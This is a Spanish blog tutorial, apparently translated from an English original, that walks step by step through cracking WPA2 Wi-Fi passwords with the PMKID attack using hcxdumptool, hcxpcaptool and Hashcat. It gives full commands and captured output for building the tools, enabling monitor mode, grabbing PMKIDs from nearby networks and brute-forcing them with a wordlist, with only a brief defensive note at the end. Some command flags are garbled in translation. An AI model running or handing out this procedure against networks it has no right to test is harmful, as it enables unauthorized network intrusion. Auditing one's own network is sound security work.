BlogWi-Fi Hacking

Cómo hackear Wi-Fi: descifrar contraseñas WPA2 con el nuevo ataque Hashcat de PMKID

Descifrar la contraseña para redes WPA2 ha sido más o menos lo mismo durante muchos años, pero un ataque más nuevo requiere menos interacción e información que las técnicas anteriores y tiene la ventaja adicional de poder apuntar a puntos de acceso sin nadie conectado. El último ataque contra PMKID utiliza Hashcat para descifrar contraseñas WPA y permite a los piratas informáticos encontrar redes con contraseñas débiles más fácilmente.

La vieja forma de descifrar contraseñas WPA2

La antigua forma de descifrar WPA2 existe desde hace bastante tiempo e implica desconectar momentáneamente un dispositivo conectado del punto de acceso que queremos intentar descifrar. Eso tiene dos desventajas, que son esenciales para que los hackers de Wi-Fi comprendan.

El primer inconveniente es el requisito de que alguien esté conectado a la red para atacarla. La contraseña de la red puede ser débil y muy fácil de romper, pero sin un dispositivo conectado para arrancar brevemente, no hay oportunidad de capturar un apretón de manos, por lo tanto, no hay posibilidad de intentar descifrarlo.

La segunda desventaja de esta táctica es que es ruidosa y legalmente problemática, ya que te obliga a enviar paquetes que desconectan deliberadamente a un usuario autorizado de un servicio por el que están pagando. Este tipo de interferencia no autorizada es técnicamente un ataque de denegación de servicio y, si se mantiene, equivale a bloquear una red. Puede meterte en problemas y es fácilmente detectable por algunas de nuestras guías anteriores.

Un nuevo método para descifrar contraseñas

En lugar de depender de la interceptación de comunicaciones bidireccionales entre dispositivos Wi-Fi para intentar descifrar la contraseña, un atacante puede comunicarse directamente con un punto de acceso vulnerable utilizando el nuevo método. El 4 de agosto de 2018, un publicar en el foro Hashcat detalló una nueva técnica que aprovecha un ataque contra RSN IE (Elemento de información de red de seguridad robusta) de un solo marco EAPOL para capturar la información necesaria para intentar un ataque de fuerza bruta.

Al igual que en los ataques anteriores contra WPA, el atacante debe estar cerca de la red que desea atacar. El objetivo será utilizar un adaptador de red inalámbrico compatible con Kali para capturar la información necesaria de la red para intentar forzar la contraseña. En lugar de usar Aireplay-ng o Aircrack-ng, usaremos una nueva herramienta de ataque inalámbrico para hacer esto llamado hcxtools.

Usando Hcxtools y Hashcat

Hcxdumptool y hcxpcaptool son herramientas escritas para pruebas de penetración y auditoría de Wi-Fi, y nos permiten interactuar con redes Wi-Fi cercanas para capturar apretones de manos WPA y hashes PMKID. Funciona de manera similar a Besside-ng en el sentido de que requiere argumentos mínimos para iniciar un ataque desde la línea de comando, se puede ejecutar contra objetivos específicos u objetivos de conveniencia y se puede ejecutar rápidamente a través de SSH en una Raspberry Pi u otro dispositivo sin un pantalla.

Una vez que se captura el PMKID, el siguiente paso es cargar el hash en Hashcat e intentar descifrar la contraseña. Aquí es donde hcxtools se diferencia de Besside-ng, en que se requiere un paso de conversión para preparar el archivo para Hashcat. Usaremos hcxpcaptool para convertir nuestro archivo PCAPNG en uno con el que Hashcat pueda trabajar, dejando solo el paso de seleccionar una lista sólida de contraseñas para sus intentos de fuerza bruta.

Vale la pena mencionar que no todas las redes son vulnerables a este ataque. Debido a que este es un campo opcional agregado por algunos fabricantes, no debe esperar un éxito universal con esta técnica. Si puede capturar el PMKID depende de si el fabricante del punto de acceso le hizo el favor de incluir un elemento que lo incluye, y si puede descifrar el PMKID capturado depende de si la contraseña subyacente está contenida en su lista de contraseñas de fuerza bruta . Si no se cumple alguna de las condiciones, este ataque fallará.

Lo que necesitarás

Para probar este ataque, deberá ejecutar Kali Linux y tener acceso a un adaptador de red inalámbrica que admita el modo de monitor y la inyección de paquetes. Tenemos varias guías sobre cómo seleccionar un adaptador de red inalámbrico compatible a continuación.

Aparte de un adaptador de red compatible con Kali, asegúrese de haber actualizado y actualizado completamente su sistema. Si no lo hace, algunos paquetes pueden estar desactualizados y causar problemas durante la captura.

Paso 1: Instale Hxctools y Hashcat

Primero, instalaremos las herramientas que necesitamos. Para descargarlos, escriba lo siguiente en una ventana de terminal.

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Luego, cambie al directorio y finalice la instalación con hacer y luego hacer la instalación.

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

Cuando termine de instalarse, pasaremos a instalar hxctools. Para hacerlo, abra una nueva ventana de terminal o salga del directorio / hexdumptool, luego instale hxctools.

~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

A continuación, cambie a su directorio y ejecute hacer y hacer la instalación como antes. Si recibe un error, intente escribir sudo antes del comando.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Finalmente, necesitaremos instalar Hashcat, que debería ser fácil, ya que está incluido en el repositorio de Kali Linux de forma predeterminada. Simplemente escriba lo siguiente para instalar la última versión de Hashcat.

~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
  libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

Con esto completo, podemos pasar a configurar el adaptador de red inalámbrica.

Paso 2: prepare el adaptador de red inalámbrica

Después de conectar su adaptador de red inalámbrico compatible con Kali, puede encontrar el nombre escribiendo ifconfig o ip a. Normalmente, se llamará algo así como wlan0. El primer paso será poner la tarjeta en modo de monitor inalámbrico, lo que nos permitirá escuchar el tráfico de Wi-Fi en el área inmediata.

Para hacer esto, escriba el siguiente comando en una ventana de terminal, sustituyendo el nombre de su adaptador de red inalámbrica por wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

 PID Name
 555 NetworkManager
 611 wpa_supplicant
6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

Ahora, su adaptador de red inalámbrica debería tener un nombre como “wlan0mon” y estar en modo monitor. Puede confirmar esto ejecutando ifconfig otra vez.

Paso 3: use Hxcdump para capturar PMKID de redes locales

Ahora estamos listos para capturar los PMKID de los dispositivos que queremos intentar atacar. Con nuestro adaptador de red inalámbrica en modo monitor como “wlan1mon”, ejecutaremos el siguiente comando para comenzar el ataque.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Rompiendo esto -I le dice al programa qué interfaz estamos usando, en este caso, wlan1mon. El nombre de archivo en el que guardaremos los resultados se puede especificar con el -o argumento de bandera. El canal que queremos escanear se puede indicar con el -C bandera seguida del número del canal a escanear.

En nuestro comando anterior, estamos usando wlan1mon para guardar los PMKID capturados en un archivo llamado “galleria.pcapng”. Si bien puede especificar otro estado valor, no he tenido éxito capturando con ningún valor excepto 1.

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

Cuando haya reunido lo suficiente, puede detener el programa escribiendo Control-C para poner fin al ataque. Esto debería producir un archivo PCAPNG que contenga la información que necesitamos para intentar un ataque de fuerza bruta, pero necesitaremos convertirlo a un formato que Hashcat pueda entender.

Paso 4: use Hxcpcaptool para convertir el volcado para Hashcat

Para convertir nuestro archivo PCAPNG, usaremos hcxpcaptool con algunos argumentos especificados. En la misma carpeta en la que está guardado su archivo .PCAPNG, ejecute el siguiente comando en una ventana de terminal.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

Este comando le dice a hxcpcaptool que use la información incluida en el archivo para ayudar a Hashcat a entenderlo con el -MI, -I, y -U banderas. El -Z flag se usa para el nombre del archivo recién convertido para que lo use Hashcat, y la última parte del comando es el archivo PCAPNG que queremos convertir.

Ejecutar el comando debería mostrarnos lo siguiente.

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

Aquí, podemos ver que hemos reunido 21 PMKID en poco tiempo. Ahora podemos usar el archivo “galleriaHC.16800” en Hashcat para intentar descifrar las contraseñas de red.

Paso 5: seleccione una lista de contraseñas y fuerza bruta con Hashcat

Para comenzar a atacar los hash que hemos capturado, tendremos que elegir una buena lista de contraseñas. Puede encontrar varias listas de buenas contraseñas para comenzar de nuevo en la colección SecList. Una vez que tenga una lista de contraseñas, colóquela en la misma carpeta que el archivo .16800 que acaba de convertir y luego ejecute el siguiente comando en una ventana de terminal.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

En este comando, estamos iniciando Hashcat en 16800 modo, que sirve para atacar los protocolos de red WPA-PMKID-PBKDF2. A continuación, especificaremos el nombre del archivo que queremos descifrar, en este caso, “galleriaHC.16800”. El -a La bandera nos dice qué tipos de ataque usar, en este caso, un ataque “directo”, y luego el -w y –kernel-accel = 1 flags especifica el perfil de carga de trabajo de mayor rendimiento. Si su computadora sufre problemas de rendimiento, puede reducir el número en el -w argumento.

A continuación, el –fuerza La opción ignora cualquier advertencia para continuar con el ataque, y la última parte del comando especifica la lista de contraseñas que estamos usando para intentar forzar los PMKID en nuestro archivo, en este caso, llamado “topwifipass.txt”.

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Dependiendo de la velocidad de su hardware y del tamaño de su lista de contraseñas, esto puede tardar bastante en completarse. Para ver el estado en cualquier momento, puede presionar el S clave para una actualización.

Paso 6: Interprete los resultados

A medida que Hashcat se agrieta, podrá registrarse a medida que avanza para ver si se ha recuperado alguna clave.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Cuando la lista de contraseñas se acerca al final, Hashcat ajustará automáticamente la carga de trabajo y le dará un informe final cuando esté completo.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018

Si ha logrado descifrar alguna contraseña, las verá aquí. En nuestra ejecución de prueba, ninguno de los PMKID que recopilamos contenía contraseñas en nuestra lista de contraseñas, por lo que no pudimos descifrar ninguno de los hash. Lo más probable es que este también sea su resultado contra cualquier red con una contraseña segura, pero espere ver resultados aquí para las redes que utilizan una contraseña débil.

El ataque PMKID Hashcat facilita los ataques Wi-Fi

Si bien el nuevo ataque contra las contraseñas de Wi-Fi facilita que los piratas informáticos intenten atacar un objetivo, los mismos métodos que fueron efectivos contra los tipos anteriores de craqueo de WPA siguen siendo efectivos. Si su red ni siquiera es compatible con el elemento de seguridad robusto que contiene el PMKID, este ataque no tiene ninguna posibilidad de éxito. Puede auditar su propia red con hcxtools para ver si es susceptible a este ataque.

Incluso si su red es vulnerable, una contraseña segura sigue siendo la mejor defensa contra un atacante que obtenga acceso a su red Wi-Fi mediante este u otro ataque de descifrado de contraseñas.

Debido a que estos ataques se basan en adivinar la contraseña que utiliza la red Wi-Fi, existen dos fuentes comunes de adivinanzas; El primero son los usuarios que eligen contraseñas predeterminadas o escandalosamente malas, como “12345678” o “contraseña”. Estos se romperán fácilmente. La segunda fuente de conjeturas de contraseñas proviene de las filtraciones de datos que revelan millones de contraseñas de usuarios reales. Debido a que muchos usuarios reutilizarán contraseñas entre diferentes tipos de cuentas, estas listas tienden a ser muy efectivas para descifrar redes Wi-Fi.

¡Espero que haya disfrutado de esta guía para el nuevo ataque Hashcat basado en PMKID en contraseñas WPA2! Si tiene alguna pregunta sobre este tutorial sobre el descifrado de contraseñas de Wi-Fi o si tiene un comentario, no dude en comunicarse conmigo en Twitter. @KodyKinzie.

Foto de portada y capturas de pantalla de Kody / Null Byte

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Mira también
Cerrar
Botón volver arriba
Cerrar